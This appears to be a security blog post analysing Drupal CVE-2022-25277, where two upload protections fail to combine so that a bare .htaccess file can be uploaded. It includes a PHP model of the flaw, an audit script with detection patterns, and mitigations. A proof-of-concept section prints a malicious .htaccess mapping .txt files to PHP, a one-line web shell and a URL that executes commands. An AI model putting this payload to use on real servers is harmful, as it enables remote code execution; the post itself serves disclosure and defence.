Drupal, a popular open-source content management system (CMS), is trusted by major organizations and governments due to its flexibility and robust security frameworks. However, even well-defended systems sometimes ship overlooked logic flaws. In this post, we'll break down CVE-2022-25277, a subtle but potentially serious vulnerability in Drupal core's file upload handling that shows why defense-in-depth matters, and why two individually correct defenses can still fail when they are combined.

Two earlier advisories each added an upload protection: SA-CORE-2020-012 sanitizes filenames with dangerous extensions, and SA-CORE-2019-010 strips leading and trailing dots so that server configuration files cannot be uploaded. The two protections did not work correctly together. If a site was configured to allow uploads with the htaccess extension, a file named ".htaccess" was not properly sanitized, letting an attacker control Apache's behaviour in the files directory and possibly achieve remote code execution (RCE). The issue was fixed in SA-CORE-2022-012. Let's explore how this happens, why it matters, and what code is affected.

References:

- SA-CORE-2020-012: Drupal core - Multiple vulnerabilities
- SA-CORE-2019-010: Drupal core - Multiple vulnerabilities
- SA-CORE-2022-012 / CVE-2022-25277: the advisory for this issue

The File Upload Trouble: Dangerous Extensions

Drupal core has, for many years, renamed uploads whose extensions are considered dangerous (like .php, .phar, .pl or .cgi). This stops attackers from uploading code or scripts that the server could later execute.

Here's (roughly) what that sanitization looks like. This is a simplified model for this post, not core's actual code: core appends ".txt" to the insecure name rather than replacing the extension (shell.php becomes shell.php_.txt), and it splits the name differently from PHP's pathinfo():

```php
// A simplified model of how dangerous extensions are neutralised on upload.
function sanitizeFilename($filename) {
    $dangerous_ext = ['php', 'exe', 'sh', 'htaccess']; // etc.
    $info = pathinfo($filename);
    // pathinfo() omits the 'extension' key entirely for names without a dot,
    // so default to '' instead of triggering an undefined-index warning.
    $ext = strtolower($info['extension'] ?? '');
    if (in_array($ext, $dangerous_ext, true)) {
        $filename = $info['filename'] . '.txt';
    }
    return $filename;
}
```

Note that this toy version does flag a bare ".htaccess", because pathinfo() reports "htaccess" as its extension and an empty basename. The bug described below is about how the real checks were combined, not about this simplified model.

Additionally, another routine was meant to strip leading and trailing dots from filenames. This prevents users from uploading files with names such as ".htaccess" or ".htpasswd" directly, since these files control critical server behavior on Apache.

```php
function stripDots($filename) {
    return trim($filename, '.');
}
```

Here's why the two protections did not work together

1. The dangerous-extension sanitization and the dot stripping were implemented independently, each assuming the other had already covered its case, and they were applied in an order in which neither caught a bare dot-file.
2. A field administrator (a restricted permission) allows the htaccess extension on a file field, and an attacker with upload access to that field uploads a file literally named .htaccess.
3. The dangerous-extension step does not fire as expected: the leading dot makes "htaccess" the only component of the name, so from that step's point of view there is no extension to rename, and "htaccess" itself is on the field's allowed list. The dot stripping that should have backstopped this case is not applied to the name that is stored, so the file is written to the filesystem as ".htaccess".
4. Apache, if AllowOverride permits .htaccess files under the public files directory (/sites/default/files/ or one of its subdirectories), applies the uploaded rules. These can override the protections in the .htaccess core writes into that directory and re-enable script execution.
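To make the failure mode concrete, here is a small PHP model written for this post. It is not Drupal core's code: core's sanitizer, its event classes and the exact code path differ, and the names it produces (such as shell.php_.txt) are not reproduced exactly. The model pairs a dangerous-extension step with a dot-stripping step, first composed so that the dot stripping only runs when the first step renamed something (one way two independently written protections end up not covering each other), then composed so that normalisation always runs first and an extensionless "htaccess" is treated as dangerous. All function names, constants and sample filenames are this example's own.

```php
<?php
declare(strict_types=1);

// Illustrative model, written for this post, of two independent filename
// protections that fail to compose. It is NOT Drupal core's code: core's real
// sanitizer, its event classes, and the exact names it produces differ.

/** Extensions a web server may execute. Drupal core keeps a similar list. */
const INSECURE_EXTENSIONS = ['phar', 'php', 'pl', 'py', 'cgi', 'asp', 'js'];

/** Bare names that configure the server when they appear as dot-files. */
const SERVER_CONFIG_NAMES = ['htaccess', 'htpasswd'];

/**
 * Protection 1 (model of the SA-CORE-2020-012 idea): split on dots, treat the
 * first part as the basename and the last as the extension. Intermediate
 * insecure extensions get an underscore (x.php.txt -> x.php_.txt) and an
 * insecure final extension gets .txt appended (x.php -> x.php.txt).
 * A name with no dot is a bare basename and is returned unchanged.
 */
function neutraliseExtensions(string $name): string {
    $parts = explode('.', $name);
    $base = array_shift($parts);
    $ext = (string) array_pop($parts);   // '' when there was no dot at all
    foreach ($parts as $i => $mid) {
        if (in_array(strtolower($mid), INSECURE_EXTENSIONS, true)) {
            $parts[$i] = $mid . '_';
        }
    }
    $out = $base . ($parts ? '.' . implode('.', $parts) : '') . ($ext !== '' ? '.' . $ext : '');
    if ($ext !== '' && in_array(strtolower($ext), INSECURE_EXTENSIONS, true)) {
        $out .= '.txt';
    }
    return $out;
}

/** Protection 2 (model of the SA-CORE-2019-010 idea): no leading/trailing dots. */
function stripDots(string $name): string {
    return trim($name, '.');
}

/**
 * Buggy composition: the dot stripping is wired into the "apply the rename"
 * step, so it only runs when protection 1 changed something. ".htaccess" has
 * an empty basename and the field-allowed extension "htaccess", so protection 1
 * sees nothing insecure, returns the name unchanged, and protection 2 never runs.
 */
function sanitizeBuggy(string $original): string {
    $renamed = neutraliseExtensions($original);
    if ($renamed === $original) {
        return $original;
    }
    return stripDots($renamed);
}

/**
 * Hardened composition: normalise first, unconditionally, then neutralise
 * extensions, then catch the case the two steps leave behind: a name that
 * after trimming is a single bare token such as "htaccess" or "php".
 */
function sanitizeHardened(string $original): string {
    $name = stripDots($original);
    if ($name === '') {
        return 'unnamed.txt';             // "..." would otherwise become an empty name
    }
    $name = neutraliseExtensions($name);
    $bare = strpos($name, '.') === false;
    if ($bare && in_array(strtolower($name), array_merge(INSECURE_EXTENSIONS, SERVER_CONFIG_NAMES), true)) {
        $name .= '.txt';
    }
    return $name;
}

$samples = ['.htaccess', '..htaccess', '.htpasswd', '.php', 'shell.php', 'shell.php.txt', 'photo.jpg', 'README'];
foreach ($samples as $in) {
    printf("%-15s buggy: %-16s hardened: %s\n", $in, sanitizeBuggy($in), sanitizeHardened($in));
}
```

Run it with `php model.php`. The first three rows show ".htaccess", "..htaccess" and ".htpasswd" surviving the buggy pipeline untouched while the hardened pipeline turns them into "htaccess.txt" and "htpasswd.txt"; ".php" and "shell.php" are caught by both, which is exactly why the gap went unnoticed: every test case with a real extension passed.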

Simple Exploit Walkthrough (Proof-of-Concept)

> *Note: This exploit requires a permission that is typically only given to trusted administrators (configuring the field's allowed extensions) plus upload access to that field. It's also mitigated by server configuration (AllowOverride) and by the file field settings themselves. It remains an object lesson in how defenses interact.*

Step 1: Set up a vulnerable file field

An administrator with the field-administration permission configures a file field to allow the htaccess extension, either in the UI ("Allowed file extensions") or via a contributed/custom module that overrides the list. The setting is the field's space-separated `file_extensions` string:

```php
// Equivalent to settings: { file_extensions: 'txt jpg htaccess' } in the
// exported field config. $field is the FieldConfig entity of the file field.
$field->setSetting('file_extensions', 'txt jpg htaccess');
$field->save();
```

Step 2: Upload the malicious .htaccess

The attacker uploads a file named .htaccess to that field. PHP files are not in the allowed list, and core renames anything ending in .php anyway, so the file instead maps an extension that *is* allowed (.txt) to the PHP handler:

```apache
# Malicious .htaccess: have Apache run allowed .txt uploads as PHP
AddType application/x-httpd-php .txt
AddHandler application/x-httpd-php .txt
```

Whether Apache honours these directives depends on the AllowOverride setting for the files directory; see the mitigations below.

Step 3: Upload the payload

A second upload places shell.txt, with an allowed extension, in the same directory:

```php
<?php system($_GET['cmd']); // Classic web shell
```

Step 4: Execute

The attacker visits

http://example.com/sites/default/files/shell.txt?cmd=id

Now shell.txt executes on the server, because the attacker's .htaccess told Apache to treat .txt files in that directory as PHP scripts.

References and Further Reading

- Drupal SA-CORE-2022-012 (this issue): https://www.drupal.org/sa-core-2022-012
- Drupal SA-CORE-2020-012: https://www.drupal.org/sa-core-2020-012
- Drupal SA-CORE-2019-010: https://www.drupal.org/sa-core-2019-010
- CVE Description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25277

Mitigating Factors

- The bug is only reachable if a site is *explicitly* configured to allow .htaccess uploads, by a field administrator (a restricted permission) or by contributed or custom code that overrides the allowed list. That is a rare and discouraged setting.
- Update Drupal core: the fix shipped in Drupal 9.3.19 and 9.4.3 (SA-CORE-2022-012).
- Never allow dangerous extensions (htaccess, php, phar and the like) on file fields unless absolutely necessary, and leave `allow_insecure_uploads` in the system.file configuration at its default of FALSE so that core keeps renaming executable uploads.
- Review the "Allowed file extensions" setting of every file field, and any module that alters it, to ensure only safe types are accepted.
- Harden the web server: setting AllowOverride None for the public files directory stops an uploaded .htaccess from taking effect, but it also disables the protective .htaccess core writes there, so replicate its directives (no script handler, PHP engine off) in the main Apache configuration, or serve the files directory from a host that does not execute PHP at all.
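As an added check for the mitigations above, here is a PHP audit script written for this post (it is not part of Drupal core or drush). It walks a public files directory, reports every dot-file other than the top-level .htaccess that core maintains, and flags any .htaccess whose body contains directives that hand files to a script engine. The marker it looks for is the SetHandler token core writes into its protective .htaccess; the directory tree, file contents, function names and the RISKY_DIRECTIVES patterns are constructed for this example.

```php
<?php
declare(strict_types=1);

// Audit helper written for this post (not part of Drupal core): walks a public
// files directory, lists unexpected dot-files, and flags .htaccess bodies that
// would hand files to a script engine. Sample tree and contents are constructed.

/** Directive patterns that re-enable script execution under Apache. */
const RISKY_DIRECTIVES = [
    'handler maps files to PHP'   => '/^\s*(Add|Set)Handler\b.*\bx-httpd-php\b/mi',
    'MIME type maps files to PHP' => '/^\s*AddType\b.*\bx-httpd-php\b/mi',
    'PHP engine switched back on' => '/^\s*php_(admin_)?(flag|value)\s+engine\s+(on|1|true)\b/mi',
    'CGI execution enabled'       => '/^\s*Options\b[^\r\n]*(?<!-)\bExecCGI\b/mi',
];

/** Marker core writes into the protective .htaccess of the public files dir. */
const CORE_MARKER = 'Drupal_Security_Do_Not_Remove_See_SA_2006_006';

/** Findings for one .htaccess body; an empty array means nothing suspicious. */
function auditHtaccess(string $content): array {
    $findings = [];
    if (strpos($content, CORE_MARKER) === false) {
        $findings[] = 'core SetHandler marker missing (file replaced or not written by core)';
    }
    foreach (RISKY_DIRECTIVES as $label => $regex) {
        if (preg_match($regex, $content, $m) === 1) {
            $findings[] = $label . ': "' . trim($m[0]) . '"';
        }
    }
    return $findings;
}

/**
 * Walk $dir recursively. Every file whose name starts with a dot is reported,
 * except the top-level .htaccess core itself maintains; every .htaccess found
 * (top level or below) is additionally audited for risky directives.
 */
function auditFilesDirectory(string $dir): array {
    $dir = rtrim($dir, '/');
    $report = ['dotfiles' => [], 'htaccess' => []];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $rel = substr($file->getPathname(), strlen($dir) + 1);
        $name = $file->getFilename();
        if ($name === '.htaccess') {
            $report['htaccess'][$rel] = auditHtaccess((string) file_get_contents($file->getPathname()));
        }
        if ($name[0] === '.' && $rel !== '.htaccess') {
            $report['dotfiles'][] = $rel;   // a .htaccess in a subdirectory is itself suspicious
        }
    }
    sort($report['dotfiles']);
    ksort($report['htaccess']);
    return $report;
}

// Constructed sample tree standing in for sites/default/files.
$root = sys_get_temp_dir() . '/files_audit_' . bin2hex(random_bytes(4));
mkdir($root . '/uploads', 0700, true);
file_put_contents($root . '/.htaccess',
    "Options -Indexes -ExecCGI -Includes -MultiViews\n"
    . "SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006\n"
    . "<Files *>\n  SetHandler Drupal_Security_Do_Not_Remove_See_SA_2013_003\n</Files>\n");
file_put_contents($root . '/uploads/.htaccess',
    "AddType application/x-httpd-php .txt\nAddHandler application/x-httpd-php .txt\n");
file_put_contents($root . '/uploads/notes.txt', "placeholder upload\n");
file_put_contents($root . '/uploads/.hidden', "placeholder dot-file\n");

$report = auditFilesDirectory($root);
foreach ($report['dotfiles'] as $path) {
    echo "unexpected dot-file: $path\n";
}
foreach ($report['htaccess'] as $path => $findings) {
    echo ".htaccess at $path: "
        . ($findings ? implode('; ', $findings) : 'core marker present, no risky directives') . "\n";
}

// Remove the constructed tree.
foreach (new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::CHILD_FIRST) as $f) {
    $f->isDir() ? rmdir($f->getPathname()) : unlink($f->getPathname());
}
rmdir($root);
```

On a real site, call `auditFilesDirectory('/path/to/sites/default/files')` instead of building the sample tree; the constructed run reports `uploads/.hidden` and `uploads/.htaccess` as unexpected dot-files, passes the top-level protective file, and flags the subdirectory .htaccess for the missing core marker plus the AddType and AddHandler lines. The regex for ExecCGI deliberately ignores the `-ExecCGI` that core's own file sets.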

In Closing

CVE-2022-25277 highlights how even well-intended security features can clash, creating windows of attack. Especially in complex platforms like Drupal, be wary of customizations and always keep up to date with security advisories. Small misconfigurations, in edge cases, can become high-impact vulnerabilities.

Stay secure, keep learning, and always question your defaults!

*Exclusive coverage by your friendly neighborhood security nerd.*

Timeline

Published on: 04/26/2023 15:15:00 UTC
Last modified on: 05/09/2023 19:26:00 UTC